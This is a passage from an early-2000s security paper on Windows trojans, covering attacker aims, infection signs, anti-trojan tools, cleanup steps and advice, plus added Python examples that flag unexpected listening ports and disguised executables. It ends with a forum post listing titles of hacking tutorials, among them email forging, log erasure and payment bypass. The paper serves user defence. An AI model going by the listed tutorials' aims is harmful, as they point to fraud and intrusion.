Some of you may think that trojans are used for damages only. Well, they can also be used for spying on someone's machine and taking a lot of private and sensitive information (industrial espionage). The attacker's interests would include but are not limited to the following:
- Credit Card Information (often used for domain registration, shopping with your credit card)
- Any accounting data (E-mail passwords, Dial-Up passwords, WebServices passwords, etc.)
- Email Addresses (Might be used for spamming, as explained above)
- Work Projects (Steal your presentations and work related papers)
- Children's names/pictures, Ages (pedophile attacker?!)
- School work (steal your papers and publish them with his/her name on it)
I'll mention again several scenarios about the attacker's mode of thinking:
- Once infected, your computer might be used as a Warez Archive. No matter how much or little free disk space you have, you'll probably have enough for the attacker's needs. He/she won't use all of your bandwidth; there will be some limit for connections to your computer, so you'll still be able to do your
work without knowing that your computer is used as a pirated software FTP Server and it is known to people worldwide who keep downloading software from YOU.
- Kiddie-Porn traders will also use your computer for storing their archives, again turning your machine into a well known place for traders of nasty and above all illegal pictures. You'll again do your work and have no clue there are illegal activities going on in your computer.
- The attacker might just want to have fun with you, open/close the CD tray, play with your mouse, annoy you somehow; that's stupid and useless but a lot of people do it.
- Your computer might be used for other illegal purposes like the attacker's usage of your IP address to hack, scan, flood, infiltrate other machines on the Internet; so the victims will see your machine is doing it, and this will definitely get you in trouble.
11.Intelligence With Trojans
-------------------------
Think for a while about how much your life depends on your computer, your ICQ, your chat program, your e-mail address and think how vulnerable your life is just because you're infected with a Trojan Horse. They can, and they have been used for intelligence for a very long time. Just by reading your e-mails,
keeping track of your contacts, reading your private conversations, the web sites you visit, ICQ history, mIRC log files with your private conversations and a log of everything you do online, a psychological profile could be created in several hours (depending on the skills of course) and your life, mode of thinking, reactions to specific future situations and needs will be revealed to some geek, wanting to recruit and/or manipulate you. This is food for thought and another topic, but just think how a combination of psychology, social engineering and computer security knowledge makes you a really powerful
guy. And remember that people reveal their REAL personalities, wishes, mode of thinking, interests only when they think nobody is watching them...
12.Trojan Ports
------------
Trojans use specific ports to communicate with the client. In the old days the well known trojan ports were mostly used, but today it's possible to change the port every time the trojan is restarted. Here is a link to the best Ports List I've come across, which probably includes all of the public trojans.
http://www.simovits.com/trojans/trojans.html
13.How Do I Know I'm Infected?
---------------------------
Sometimes you think it's normal Windows behaviour when there are 500 MB or so missing on your HDD, because some software is using it, or you have installed a game you forgot about and many other reasons but not the real one. Here are some things which are very suspicious, and no matter how much your Anti-Virus software tells you that you aren't infected, dig a little deeper and see what really happened. One thing that will help you is to know the main features of the public trojans, so you'll be able to react if you notice such activity on your PC. I have included links to various Trojan Databases that you should visit if you want to know the main features of the public ones.
- It's normal to visit a web site and have several more pop-ups appear with the one you've visited. But when you do completely nothing and suddenly your browser directs you to some page unknown to you, take that seriously.
- A strange and unknown Windows Message Box appears on your screen, asking you some personal questions.
- Your Windows settings change by themselves like a new screensaver text, date/time, sound volume changes by itself, your mouse moves by itself, CD-ROM drawer opens and closes.
Please note that most advanced attackers will just spy on you and use your infected machine for some specific reason, and not perform any of the above "tricks" so as not to cause any suspicious activity on the target system (as this would probably mean they could get easily detected). Someone that just
wants to have fun with you is more likely to perform these actions.
14.Anti-Virus (AV) Scanners
-------------------
In the old days Virus Scanners used to detect only viruses and just a small part of the public trojans on the Internet. Realising how dangerous and popular Trojans are becoming, today most, if not all, of these scanners detect probably all of the public ones out there. As always, people think they are
safe and secure when using a Virus Scanner, but it's a false sense of security. This type of software relies mainly on "signatures" of each trojan's server executable and also its common auto-starting methods, but that is far from a perfect solution for protecting yourself against trojans, as they use many other methods to hide inside the machine, most of which are undetected by Anti-Virus Software. When trojans became a big security breach, specific Anti-Trojan packages were released to the public and it was necessary for the
AVs to start detecting not only viruses, but also trojans if they wanted new users. As a result, most of them became really advanced trojan scanning and detection systems, but for your maximal protection it's recommended to use both Anti-Virus and Anti-Trojans software.
Public trojans appear online almost every day and the detection software is updated every day for maximal protection of its customers. One very big problem is that the users do not update their signature files as often as they should, thus having detection software that's not detecting several more trojans or viruses. Users MUST update their software's signature files every day, and it will take them only several minutes. Each and every time a new file is downloaded, it MUST be scanned with Anti-Virus and Anti-Trojan software BEFORE being opened. If you think the file is suspicious for some reason, do NOT run it, but send it to your detection software labs for analysis.
15.Anti-Trojan Software
--------------------
Here are reviews of the most popular Anti-Trojan packages. The list also includes various applications (freeware) to help you monitor your computer for ongoing Trojan activities. I suggest you visit the site of every product and decide which one best fits to your needs. Check the links section at the end of the paper to see various sites, providing reviews of the software below.
-- TDS-3 --
Trojan Defence Suite (TDS) is an indispensable, must-have software package for protection against trojans. It has many unique functions never seen in other Anti-Trojan packages. The program has really advanced features and if you're a newbie, it will probably take some time before you are able to use the software at its full capacity (read the excellent help files).
You can get TDS from http://tds.diamondcs.com.au/
-- LockDown2000 --
This is a really good Anti-Trojan package that detects a LOT of trojans and other programs known as "hacking tools". It will help you monitor your system files for changes, processes and registry modification. More info at its home page.
You can get LockDown2000 from http://www.lockdown2000.com
-- TFAK5 --
Trojans First Aid Kit is a trojan-scanner developed by SnakeByte. It has many other unique features; it could be used as a Client for various public trojans as well.
Download TFAK5 from http://www.snake-basket.de/tfak/TFAK5.zip
-- Trojan Remover --
Anti-Trojan software detecting 5468 trojans/worms (including variants) as at 15th August 2002. System files and registry monitoring functions are also implemented. More info at its home page:
http://www.simplysup.com/tremover/details.html
-- Pest Patrol --
A tool that scans for trojans as well as programs known as "hacking tools" and spyware. More info at its official page:
http://www.safersite.com/
-- Anti-Trojan 5.5 --
Trojans detection package that is able to remove most of the public trojans out there. More info at its official page:
http://www.anti-trojan.net
-- Tauscan --
Trojan scanner that has unique features and is a must have. It's also able to detect new and never released to the public trojans. More info at its official page:
http://www.agnitum.com/products/tauscan/
-- The Cleaner --
Very popular Anti-Trojan software, known by everyone. Check its home page at:
http://www.moosoft.com/
-- PC Door Guard --
Trojan detection software, detecting a lot of trojans, and a monitor of files and directories is also included. More info at:
http://www.trojanclinic.com/pdg.html
-- Trojan Hunter --
Trojan detection package with a lot of functions. It's very handy.
More info at http://www.mischel.dhs.org/trojanhunter.jsp
-- LogMonitor --
Log Monitor is a file and directory monitoring tool. The program periodically checks a selected file's modification time and executes an external program if the file's time was changed or not changed. For directories it handles such events as files change, addition or removal. I recommend this tool as it's very handy and will help you a lot.
Home page: http://logmon.bitrix.ru/logmon/eng/
-- PrcView --
PrcView is a freeware process viewer utility that shows detailed information about running processes. This information includes such details as the create date/time, the version and full path for each DLL used by a selected process, a list of all threads, memory blocks and heaps. PrcView also allows you to
kill and attach a debugger to a selected process. PrcView runs on both Windows 95/98 and Windows NT platforms and includes Windows and command-line versions of the program.
Get PrcView from http://www.xmlsp.com/pview/prcview.htm
-- XNetStat --
GUI based netstat tool for Windows. It will help you monitor your machine for open ports. Download it from:
http://packetstormsecurity.org/Win/netstat.zip
-- ConSeal PC FIREWALL --
A really good firewall for advanced users using Windows having basic knowledge of TCP/IP and other protocols; this software will help you to secure your PC a lot. It has some major advantages over other Win based firewalls. For the full range of specifications, check its official web page at:
http://www.consealfirewall.com/
16.After You Clean Yourself
------------------------
Your machine has been compromised and probably a lot of sensitive data stolen, files have been modified and illegal activities have been performed on your computer. Here I'll give you recommendations about what to do after you are 100% clean of trojans.
- Accounting Data such as ISP passwords, ICQ, mIRC, FTP, web site passwords, e-mail address passwords are definitely known to the attacker. Contact your ISP about changing your dial-up password if you're using such a connection. Immediately change your ICQ, mIRC passwords, of course if they're still the same. (Often attackers won't change any of your accounting data, to fool you into thinking everything is OK, so there is a big chance you will still be able to recover from the compromise). Change your web based e-mail passwords and do check your information stored there, as password retrieval services for various e-mail providers such as Yahoo and Hotmail use this info combined with a "Secret Question" for password retrieval. Attackers often change the info, the answer to the secret question and many other things that will get them easily back into your mailbox, whether you've changed your pass or not.
- If you're taking advantage of the handy Address Book feature in your e-mail service, and have a list full of e-mails of friends, colleagues, etc. there is a real possibility that the attacker has sent them a trojan and possibly infected them too. Mail all of these people and ask them about receiving any files from your mailbox, inform them someone else might know your e-mail password so they'll be able to take appropriate actions like checking their machines for Trojans. Do the same with the people from your ICQ contact list as they might be targeted too.
- Check your HDD for abnormal activities like a lot of free space missing etc. Search for warez software and, as I mentioned, kiddie-porn archives.
- Think for a while about the sensitive information you had on your machine before the compromise, and if you are absolutely sure the attacker may know it too, then take appropriate action, like informing any institutions the sensitive data belong to.
- Scan your machine with an Anti-Virus scanner, as the attacker could have placed some virus or infected macro documents on your machine to do destructive things even if there's no access for him/her to your machine.
- Monitor your processes BEFORE and AFTER connecting to the Internet, as some trojans start when they detect Internet connection. Don't get fooled again, be very suspicious.
17.Online Scanning Services
------------------------
These services are very popular these days and they are very handy for users who haven't got much knowledge on all of the holes they're checking for, but wanting to ensure they are protected from all of them. This section is placed at the end of the paper with a specific reason. If you have read the paper,
you should know a LOT about trojans by now, their principles of working and detection techniques, therefore you can decide whether these online scanners are useful or if they give a false sense of safety.
There are several types of Online Scanners: Trojan Scanner, Port Scanner and Bugs Checker.
- Trojan Scanner
It's using a list with predefined ports, associated with the name of the trojan responding to its default port, like Girl Friend=21544, and if this port is in "listening" state on your machine it will inform you that you've been infected with the GirlFriend Trojan. As you already know, trojans have functions like changing their default port to ANY of the attacker's choice.
That makes these Trojan Scanners kind of useless, because serious attackers do change the default port for sure.
- Port Scanner
This service has two options: a well-known ports scan and an all ports scan. The first feature is scanning for well known ports, again associated with the appropriate service related to the port like port 21-FTP, 23-Telnet, 25-SMTP. The second feature is rarely seen on a free service, because of the bandwidth it would generate to scan all of the 65,535 ports. It will again
associate ports with services like I mentioned above, and if it finds any unknown ports not associated with any service, it will also report it, like Port 34525 State:Listening, which means this port is waiting for connections from the outside.
- Bugs Checker
Its purpose is to check your Browser or your E-mail Software for well known bugs and security related problems. If any are detected, it will point you to a site containing the patches for these bugs or a site with the latest updated versions of the software.
It's strongly recommended to close any other Internet related application on your machine before being scanned by Online Trojan Scanner and Port Scanner. You decide which service is best for you, which one will be able to detect trojan infections on your machine, and which won't; you now know the main principles and the answers too, I hope. Links to several online scanning services I know of are included in the Links Section.
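The Trojan Scanner and Port Scanner checks described in this section can be reproduced locally against `netstat -an` output, which also shows why a name-based check goes quiet once the default port is changed. This is an added example, not part of the original paper: the netstat samples are constructed, the function names are illustrative, and the port tables hold only the ports the paper names (GirlFriend=21544, 21/23/25, the unknown listener 34525) plus the standard NetBIOS ports 137 and 139.

```python
import re

# Port tables: only the entries the paper names, plus the standard NetBIOS
# ports. A real check would load a full list such as the one the paper links to.
KNOWN_SERVICES = {21: "FTP", 23: "Telnet", 25: "SMTP",
                  137: "NetBIOS name", 139: "NetBIOS session"}
DEFAULT_TROJAN_PORTS = {21544: "GirlFriend"}

# Constructed `netstat -an` output in the Windows layout (not from a real host).
SAMPLE_DEFAULT_PORT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:21544          0.0.0.0:0              LISTENING
  TCP    192.168.0.5:1047       203.0.113.9:80         ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""
# The same host after the listener was reconfigured away from its default port.
SAMPLE_MOVED_PORT = SAMPLE_DEFAULT_PORT.replace(":21544 ", ":34525 ")

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?\s*$")


def parse_listeners(netstat_text):
    """Return (proto, port) for every socket waiting for inbound traffic."""
    listeners = []
    for line in netstat_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # banner, column header or blank line
        proto, _addr, port, state = match.groups()
        # TCP reports LISTENING explicitly; UDP has no state column, so
        # every bound UDP socket is treated as reachable.
        if proto == "UDP" or state == "LISTENING":
            listeners.append((proto, int(port)))
    return listeners


def trojan_scanner(listeners):
    """Name-based check: report a trojan only if its default port listens."""
    return [DEFAULT_TROJAN_PORTS[port] for _proto, port in listeners
            if port in DEFAULT_TROJAN_PORTS]


def port_scanner(listeners, baseline=frozenset()):
    """Label every listener; anything not explained is left as 'unknown'."""
    report = []
    for proto, port in listeners:
        if port in DEFAULT_TROJAN_PORTS:
            verdict = "trojan-default:" + DEFAULT_TROJAN_PORTS[port]
        elif (proto, port) in baseline:
            verdict = "expected"
        elif port in KNOWN_SERVICES:
            # A port number is only a hint: any program can bind port 21.
            verdict = "service?:" + KNOWN_SERVICES[port]
        else:
            verdict = "unknown"
        report.append((proto, port, verdict))
    return report


def needs_review(report):
    """Listeners the owner should trace back to a running process."""
    return [(proto, port) for proto, port, verdict in report
            if verdict != "expected"]


if __name__ == "__main__":
    # Hypothetical baseline: file sharing the owner knowingly enabled.
    baseline = {("TCP", 139), ("UDP", 137)}
    for label, text in (("default port", SAMPLE_DEFAULT_PORT),
                        ("moved port", SAMPLE_MOVED_PORT)):
        found = parse_listeners(text)
        print(label, trojan_scanner(found),
              needs_review(port_scanner(found, baseline)))
```

On the second sample the name-based check returns nothing, while the comparison against the owner's own baseline still surfaces port 34525 and the unexpected listener on port 21.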
18.Advice
------
This is a very useful section, full of tips and advice on how to protect yourself from trojans using various ways you've already read about, but summarised here for faster reading and hopefully better understanding.
[01] Never accept a file even if it is from some friend. You're never sure who's on the other side of the computer at the moment. If you really need this file, let's say some presentation or a work paper, find other ways, like the phone, and verify the file is from your friend. Yeah it will take you
some time and slow you a bit, but be paranoid about attachments you may receive and don't get infected.
[02] When executing files, first check their type. Is it really a .doc, or is it some executable with a .doc icon?
[03] Update your Anti-Virus and Anti-Trojan package signature files regularly, if possible EVERY day for maximal protection, as new trojans and viruses are discovered every day. Most detection software has functions like scheduling scans, so if you are away from your machine during the night but you leave it switched on, why not consider scheduling a scan and update every night? Doing so will ensure your maximal protection.
[04] Make sure you always have the latest version of the software you're using as new bugs appear very often and programs are regularly updated. Check often to see if there are bugs and/or other problems found in software that may potentially expose your system to risk - and patch/update your system(s) accordingly. Some software has an option to check for the latest version of the software from the vendor web site; make use of it.
[05] Take several minutes and regularly check the processes on your machine with the software I reviewed above. You'll be surprised what you may detect sometimes.
[06] It's vital to understand the risk of getting software from someone you just met, or had only several ICQ, IRC conversations with.
[07] Consider freeware programs as very risky software to download, and try searching for some reviews of the program before running it.
[08] Carefully read the help files coming with your detection software to be able to use them to their full capacity.
[09] Download software ONLY from its official page(s) or dedicated mirror web site. Never get the latest version of mIRC or ICQ from some site you've never heard about like from some free web space provider like Geocities. Consider it as an untrusted site and do NOT download anything from there.
[10] If you are playing with trojans you can also get infected, as there are trojans or other software that are already infected and are waiting for someone with not so much knowledge on the topic to download and use them.
[11] Don't be so naive about everything you see on the Internet or what various sites offer you - don't download some software you've never heard about.
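Tip [02] can be automated by comparing what a file's name claims with what its first bytes say. This is an added example, not part of the original paper: the function names and extension sets are illustrative assumptions, and the byte strings used to exercise it are constructed.

```python
import os

# Extensions Windows will run when double-clicked, and harmless-looking ones
# commonly used as a disguise. Both sets are illustrative, not complete.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs"}
DECOY_EXTS = {".doc", ".txt", ".jpg", ".gif"}

MZ_MAGIC = b"MZ"                                # DOS/Windows executable header
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # container used by Word .doc


def sniff(head):
    """Classify a file by its first bytes instead of by its name."""
    if head.startswith(MZ_MAGIC):
        return "executable"
    if head.startswith(OLE2_MAGIC):
        return "ole2"
    return "other"


def check_file_type(filename, head):
    """Return a list of findings; an empty list means name and content agree."""
    # Windows ignores trailing dots and spaces, so "a.exe. " still runs as a.exe.
    name = os.path.basename(filename).rstrip(" .").lower()
    stem, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(stem)[1]
    kind = sniff(head)
    findings = []
    # "paper.doc.exe" is displayed as "paper.doc" when known extensions are hidden.
    if ext in EXECUTABLE_EXTS and inner_ext in DECOY_EXTS:
        findings.append("double-extension")
    # Executable bytes behind a document-style name.
    if kind == "executable" and ext not in EXECUTABLE_EXTS:
        findings.append("executable-content")
    # A .doc that is not an OLE2 container (RTF, for instance) deserves a look.
    elif ext == ".doc" and kind != "ole2":
        findings.append("not-a-word-container")
    return findings


def check_path(path):
    """Convenience wrapper: inspect the first 8 bytes of a file on disk."""
    with open(path, "rb") as handle:
        return check_file_type(path, handle.read(8))


if __name__ == "__main__":
    # Constructed inputs: a name plus the first bytes of the file.
    for name, head in (("paper.doc.exe", b"MZ\x90\x00"),
                       ("paper.doc", b"MZ\x90\x00"),
                       ("paper.doc", OLE2_MAGIC),
                       ("setup.exe", b"MZ\x90\x00")):
        print(name, check_file_type(name, head))
```

An empty result only means the name is honest about the file type; an honestly named setup.exe still has to be scanned as described in tip [03].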
19.Links Section
-------------
This section will be very useful for everyone interested in reading various papers about trojans written by other people, anti-trojan software review sites, trojan archives, trojan protection portals and many other sites related to the topic. If you want me to add your link in the next update, mail me and if the site is somehow related to the topic, I will definitely include it in the list.
Please don't forget that you can find these and many other security related links at our extensive web links directory at Frame4 Security Systems; check it out at: http://www.frame4.com/php/modules.php?name=Web_Links
-- Trojan Portals and Archives --
URL : http://www.tlsecurity.net
DESC : Excellent, well-known security portal providing many trojan resources and information regarding the topic
URL : http://www.euyulio.org
DESC : Security portal, huge trojans archive and other unique features
URL : http://www.megasecurity.org/
DESC : Megasecurity portal having huge trojans archive and well sorted library on the subject
URL : http://www.trojan.ch
DESC : Trojans portal, news, archive, unique programs
URL : http://www.trojanforge.net/
DESC : Trojans portal, trojans archive, documents, www-board
URL : http://packetstormsecurity.org/trojans
DESC : Packetstorm's trojans section
URL : http://www.pcflank.com
DESC : Security portal providing various functions as browser tests, remote trojan scanning
URL : http://www.staff.uiuc.edu/~ehowes/trojans/tr-tests.htm
DESC : Site showing results of actual (functional comparison) tests performed with various trojan detection programs
-- Trojan Database Libraries --
URL : http://www.simovits.com/trojans/trojans.html
DESC : Huge, detailed and well sorted list of trojans and their functions
URL : http://www.tlsecurity.net/tlfaq.htm
DESC : Comprehensive list and analysis of probably all the public trojans
URL : http://www.blackcode.com/trojans/
DESC : Trojans/worms library database provided by BlackCode
-- Anti Trojan Sites --
URL : http://www.hackfix.org/
DESC : Site with resources related to trojan protection and helping newbies
URL : http://www.nohack.net/
DESC : The nohack project helps newbies clean their PCs and protect themselves
URL : http://www.virushelp.info
DESC : IRC channel related to virus and trojans protection
URL : http://www.anti-trojan.org
DESC : Anti-trojan help site
-- Detection Software Reviews --
URL : http://www.wilders.org/anti_trojans.htm
DESC : Site providing reviews of anti-trojan software
URL : http://www.rokopsecurity.de/
DESC : German site providing reviews of various anti-virus and anti-trojan software, and many other information (site language is German)
URL : http://www.fruitloop.net/virushelp/index.html
DESC : Site providing reviews of detection software
URL : http://www.firewallguide.com/anti-trojan.htm
DESC : Site providing various security related services and reviews
-- Papers Regarding Windows Trojans --
URL : http://www.jmu.edu/computing/info-security/engineering/issues/remote.shtml
DESC : Interesting paper about windows trojans
URL : http://members.ozemail.com.au/~netsafe/trojan_index.html
DESC : Detailed information about windows trojans
URL : http://researchweb.watson.ibm.com/antivirus/SciPapers/Whalley/inwVB99.html
DESC : Windows trojans
URL : http://researchweb.watson.ibm.com/antivirus/SciPapers/Smoke/smoke.html
DESC : Another must read paper
URL : http://www.frame4.com/content/files/the_gentle_art_of_trojan_horsing_under_windows.txt
DESC : Windows trojans
URL : http://www.frame4.com/content/files/trojdetecte.txt
DESC : Snakebyte's tips about trojan detection
URL : http://www.frame4.com/content/files/what_trojan.pdf
DESC : Paper about windows trojans
URL : http://www.frame4.com/content/files/Trojan_reversing.txt
DESC : Interesting reading
-- Online Scanners --
URL : http://www.hackerwhacker.com/
DESC : A must visit vulnerability checker with unique features
URL : http://www.scannerx.com
DESC : Vulnerability assessment scanner
URL : http://scan.sygatetech.com/
DESC : Security scanner
-- Browser and E-mail Software --
URL : http://www.nwnetworks.com/iesc.html
DESC : Internet Explorer security centre
URL : http://www.guninski.com
DESC : Browser and active content researcher, a must visit
URL : http://www.sophos.com/virusinfo/whitepapers/activecontent.html
DESC : Whitepaper about active content security
-- Misc --
URL : http://directory.google.com/Top/Computers/Security/Anti_Virus/Trojans/
DESC : Google's trojans directory
URL : http://support.microsoft.com/support/kb/articles/q262/6/31.asp?LN=EN-US&SD=gn&FR=0
DESC : Risky file extensions
URL : http://www.frame4.com/content/files/razor.wintrinoo.txt
DESC : Review of the WinTrinoo trojan
URL : http://www.megasecurity.org/Info/mIRC.txt
DESC : Very detailed paper on mIRC backdoors
20.Final Words
-----------
I really hope you've realised how big a security problem Windows Trojan Horses are, and you've become a little paranoid about your security. If you've ever found yourself infected, I also hope that while reading the paper, you have understood how you may have gotten infected the last time and I'm sure you won't make the same mistake again. The paper will be regularly updated with the latest info regarding the topic, as new variations of trojans and ways of infection appear very often. If you think I've missed something, please do not hesitate to contact me and contribute to it. Your feedback, ideas, comments, suggestions and everything related to the paper and the topic will be gratefully appreciated. I can be contacted at dancho.danchev@frame4.com.
Part of the Frame4 Security Systems Publications Archive, this paper can be located at http://www.frame4.com/publications/index.php. Please visit the
archive to get the latest updates to this paper and many other security related documents.
----------------------------------------------------------------
This paper is a Frame4 Security Systems publication, all rights reserved. You may (re-)distribute the text as long as the content is not changed in any way and with this header text intact. If you want to serve this paper on your web site/FTP/Newsgroup/etc., I encourage you to do so but please do not change it in any way without the prior permission of the author.
IMPORTANT -- THIS DOCUMENT IS FOR INFORMATIONAL PURPOSES ONLY. To the maximum extent permitted by applicable law, in no event shall Frame4 Security Systems be liable for any damages whatsoever, (including, without limitation, damages for loss of any business profits, business interruption, loss of any business information, or other pecuniary loss) arising out of the use, or inability to use any software, and/or procedures outlined in this document, even if Frame4 Security Systems has been advised of the possibility of such damage(s). There
are NO warranties with regard to this information, but the paper may help you improve your Windows security a lot.
This paper is the property of Frame4 Security Systems, all rights reserved.
Copyright (c) 1999-2002 Frame4 Security Systems -- http://www.frame4.com…
- Added by Paulhammer at 1:36pm on May 2, 2008
- Topic: 200 Hacking Tutorials
- arison Guide.txt
20 Great Google Secrets.txt
23 Ways To Speed WinXP, Not only Defrag.txt
250+ Tech books online.txt
2600 Hertz Single Tone Generator Schematic.txt
36 Graphics & Design Ebooks.txt
8 People Can Use The Same Msn Dial Up Account.txt
A Basic Guide to the Internet.txt
A Basic UNIX Overview.rtf
A BEGINNERS GUIDE TO Hacking Unix.txt
A Cracking Tutorial
A Guide to Internet Security- Becoming an Uebercracker.txt
A Guide to the Easiest Hacking there is.txt
A List of every TeleNet code that there is.txt
A List Of Government BBS Numbers.txt
A List Of Some OF The Most Useful UNIX Hacking Commands.htm
A Novice's Guide to Hacking 2004.txt
A Novice's Guide To Hacking.txt
A Short HACKER SPEAK Glossary.txt
A simple TCP spoofing attack.txt
A Small Guide to Hacking HOTMAIL.txt
A UNIX Hacking Tutorial.txt
A very small tut for RealMedia.txt
A Web Standards Checklist, How to make a proper website.txt
Accessing the bindery files directly.txt
Accessing The Entire Internet On Your 3 Phone, U8110, E616 etc..txt
Advanced Shellcoding Techniques.txt
All about ftp must read.txt
All About Movie Tags (what Is A Dvdrip, Cam Etc.).txt
ALL About Spyware.txt
All mIRC Commands.txt
Almost Everything You Ever Wanted To Know About Security (but.txt
An Architectural Overview of UNIX Network Security.htm
An Extensive Guide to Bell System Man Holes.txt
An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt
An Introduction into TeleScan.txt
An Introduction to Denial of Service.txt
An Introduction to the Computer Underground.txt
An Introductory Guide To TeleNet Commands.txt
Anarchist Cookbook 2004
Anonymity complete GUIDE.rtf
Anonymity of Proxy, Anonymity Of Proxy learn it insideout.txt
Anonymity.txt
ANONYMOUS emails.txt
Anonymous FTP FAQ.htm
ANSIBombs II Tips And Techniques.txt
anti leech hacking tutorial.txt
Area Codes and Time Zones.txt
attacks on networks how to stop.htm
Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak.txt
Automatic Windows Installation, No keypress required!.txt
B.A. regedit.txt
Backdoor.txt
Backdoors.txt
Backtracking EMAIL Messages.txt
Bandwidth Explained!.txt
Basic Networking.txt
BBS CRASHING TECHNIQUES.txt
Becoming A Phreaker - The Quick n' Easy Way.txt
Beep Code Manual.txt
Beep Codes Error Codes.txt
Bell Hell Volume #1.txt
Bell Hell Volume #2.txt
Best Keyboard Shortcuts.txt
Big Brother And Ndisuio.sys, A new Internet phenomenon.txt
Bin & Cue Simple Tut.txt
BIOS Update Procedure.txt
Bit Torrent Tutorials.txt
Block Adservers.txt
Boot Block Recovery For Free.txt
Boot Winxp Fast.txt
Border And Text Effects In Psp8, For use with PSP8.txt
Breaker B0X.txt
Broken Ie, How to fix it.txt
BRUTE- A brute force approach to hacking Unix passwords.txt
Bulk Editing Of .xxx to .zip or .mp3.txt
BulletProof FTP Server Tutorial.txt
Burn .bin file Without A .cue file.txt
Burn a BIN without a CUE using NERO.txt
Burning Bin & Cue Using Nero.txt
Bust Avoidance For Dipshits.txt
busybox.txt
Bypass Internet Censorship.txt
Calculating Offsets.txt
cannot use my password to get back into Windows XP.txt
Cant See Secure Sites.txt
Caught A Virus.txt
Cellular Listening with a TV .txt
Cellular Telephone Phreaking Phile Series VOL 1.txt
Change Music In The Malibu And The Pole Position, GTA Vice Modders.txt
Change Text on XP Start Button.rtf
Change Text on XP Start Button.txt
Change The Default Location For Installing Apps.txt
Change The Storage Location Of 'my Documents', a bit safer for when your PC crashes....txt
Change Your Ip In Less Then 1 Minute.txt
Changing Default Location For Installing Apps.txt
Check For Dos, Check to see if you are infected..txt
Choosing A Good Domain Name, ya..good name is important!.txt
Choosing An Internet Merchant Account, nice info on Internet Merchant Account...txt
Clear Unwanted Items From Add And Remove.txt
Closing Open Holes, System Security How to close open holes.txt
Closing the Net.txt
CMD Prompt here, add to folder context menu windows xp.txt
COMMON FTP ERROR CODES.txt
Compression and Cracks for Dummies.txt
Computer Acronyms.txt
Computer Bulliten Boards and the Law.txt
Computer Chrime - Current Practices, Problems and Proposed So.txt
Computer eMail and Privacy.txt
Computer Hackers News Articles.txt
Computer Matinence.txt
Computer Rights vs First and Forth Amentment Right.txt
Computer Security.txt
Computer Security_2.txt
Computer Viruii.txt
Computerized Governmental Database Systems Containing Persona.txt
Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial.txt
connect A Psx Pad To Pc, Warning soldering is involved...txt
Convert Stubborn Webpage To pdf.txt
Convert To Basic And Dynamic Disks In Windows Xp.txt
Converting Movies To Psp Format.txt
Converting to NTFS.txt
COPS and Robbers-Unix System Security.txt
COPY X BOX GAMES!.txt
Copyright Guides for Photographers.txt
Cracking Bios, use the followin' code.txt
Cracking Zip Password Files.txt
Crap Software Config Settings, How to set-up the firewall.txt
Crash Course in X Windows Security.txt
Create A Huge File.txt
Create A Personal Screen Saver In Win Xp!.txt
Create An Ftp Server On Your Pc With Serv-u.txt
Create Bootable Win XP SP1 CD(nero).txt
Create Bootable XP SP integrated CD.txt
Create One-click Shutdown And Reboot Shortcuts.txt
Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Crime and Puzzlement.txt
Cultural Formations in Text-Based Virtual Realties.txt
Cyberspace and the Legal Matrix- Laws or Confusion.txt
Dark Angel's Phunky Virus Writing Guide .txt
Data Capacity of CDs [Tutorial].txt
Debug, Learn how crack windows.txt
Defamation Liability of Computerized Bulliten Board Operators.txt
Delete An undeletable File.txt
Delete Files From The Recent File List In Windows.txt
Dept of Treasury Letter.txt
Digital Camera Guide.txt
Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt
Digital Photo Id Cards, Greate Info.txt
Direct Link To Any Page You Want To In Hotmail.txt
Directx Explained.txt
Disable Compression On Xp, NTFS partition, Disk Cleanup.txt
Disable The Send Error Report, to Mcft.txt
Disable Windows Logo Key.txt
Discover New Music You'll Probably Love.txt
Do You Want To Learn Maya 6, look, some tutorials.txt
Doom 3 Speed Up, Guaranteed 40% better.txt
Doom3 Simple Tweeks, how to run doom with tweeks.txt
Dos User - No Boot Dos Disk, No Edit.com,How to create Imp Files.txt
Download Free Music legally,, legally.txt
Download from a paypal site without paying a penny!.txt
Download From Ftpz, Using Ftp Search Sitez.txt
Download Mp3's Without Using Filesharing.txt
Download Music And Video With ,edia Player9, quick and easy!.txt
Download Timeframes.txt
Downloading Files, Using Archives And Images.txt
Downloading Windows Media Streams.txt
Drake's Phreaking Tutorial.txt
Dreamweaver Tut That Teaches U, to search a database with phpmysql.txt
Driverguide.com.txt
Dual Boot After The Fact.txt
Dvd Copying-ripping Definitions.txt
DVD Regions Information.txt
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt
Easily Disconnect-reconnect From Broadband.txt
Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt
Ebay Hackcracktip.txt
Electronic Bulliten Boards and 'Public Goods' Explainations o.txt
Electropolos - Communication and Comunity on IRC.txt
Eliminate Ie's Autocomplete Reminder.txt
Email Forge, sends email from anyone.txt
Enable Folder and Icon Refresh, Win XP Tweak.txt
Erasing_Your_Presence_From_System_Logs.txt
Ethload User's Guide.txt
Evolution Of Computer Viruses History Of Viruses.txt
Excellent tricks and techniques of Google Hacks.txt
Exploseek, a simple tool to find music on the net.txt
Find Stuff.txt
Finding Missing Files From A Release.txt
Firefox Speed Tweaks.txt
Firefox Tweaks.txt
Firewall Protection how to.rtf
FlashFXP FAQ.txt
Flashget Broadband Tweak.txt
FLASHGET INTEGRATION IN OPERA,MOZILLA,NETSCAPE.txt
FlashGet v1.4 - More Download Simultaneously.txt
Flashing A Video Card Bios [advanced Guide], Step-by-Step Guide for Novice and Expert.txt
Formatting An Hdd, when fdisk won't.txt
Formulating A Company Policy on Access to and Use and Disclos.txt
Free Access To Websites Without Registering.txt
FREE Hosting For WAREZ.txt
